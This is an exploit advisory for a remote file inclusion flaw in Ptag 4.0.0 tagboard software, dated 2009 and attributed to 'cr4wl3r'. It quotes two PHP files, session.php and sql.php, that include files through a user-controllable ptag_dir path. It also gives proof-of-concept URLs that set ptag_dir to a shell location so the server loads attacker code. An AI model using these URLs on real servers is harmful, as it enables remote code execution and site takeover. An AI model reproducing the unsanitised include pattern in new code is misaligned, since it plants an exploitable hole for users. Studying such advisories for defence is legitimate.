##################################################################
## Exploit Title: Ptag <= 4.0.0 Multiple RFI Exploit ##
## Date: 19-12-2009 ##
## Author: cr4wl3r ##
## Software Link: http://sourceforge.net/projects/ptag/ ##
## Version: N/A ##
## Tested on: GNU/LINUX ##
##################################################################
~ Code [session.php]
<?php
//Plottable Tagboard Systems Version 4.0.0 - ROLAND
//Session handling File
require_once(ptag_dir."lib/php/crossSession.php");
class ptag_session extends crossSession{
public function __construct(){
global $ptag_sql;
$this -> sql_table = ptag_prefix."session";
$this -> cookie_name = ptag_prefix."session";
//If RSS mode, switch session to non-viewed tracker.
if (ptag_output == "rss"){
parent::__construct($ptag_sql, sha1(""));
}
else{
parent::__construct($ptag_sql);
}
}
}
?>
~ PoC
[Ptag_path]/lib/session.php?ptag_dir=[Shell]
~ Code [sql.php]
<?php
//Plottable Tagboard Systems Version 4.0.0 - ROLAND
//Extending MySQL class
require_once(ptag_dir."lib/php/ezmySQL.php");
class ptag_sql extends ezmySQL{
public function __construct(){
parent::__construct(ptag_mysql_host, ptag_mysql_user, ptag_mysql_pass, ptag_mysql_db);
}
protected function error_handler($err){
$error = "A MySQL error has occured: (".$err["errno"].") ".$err["error"]." when executing the query: ".$err["query"];
return ptag_exception::handle_error($error, $err["line"], $err["file"], $err["class"], $err["method"]);
}
}
?>
~ PoC
[Ptag_path]/lib/sql.php?ptag_dir=[Shell]
